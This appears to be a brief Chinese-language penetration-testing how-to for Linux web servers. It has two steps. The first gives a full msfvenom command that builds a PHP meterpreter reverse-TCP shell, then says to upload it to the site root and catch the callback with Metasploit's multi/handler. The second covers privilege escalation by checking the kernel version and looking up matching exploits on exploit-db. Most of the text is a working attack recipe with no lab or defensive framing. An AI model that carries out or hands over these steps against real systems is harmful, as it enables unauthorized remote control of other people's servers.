1. 获得反弹shell

  区别于Windows,Linux因为exe不是可执行文件,所以要换其他的方法。

  生成反弹shell的php:

    msfvenom -p php/meterpreter_reverse_tcp LHOST=本地IP LPORT=12345 -f raw > /var/www/html/shell.php

  将生成的php上传到网站根目录下,本地打开监听(exploit/multi/handler模块,监听的payload为php/meterpreter_reverse_tcp),然后访问该shell,即可反弹shell

 

2. 提权

  metasploit对于提权linux模块不是很多,一般情况下需要查看系统内核(uname -a)然后去寻找合适的漏洞进行利用。

  漏洞查询网站: https://www.exploit-db.com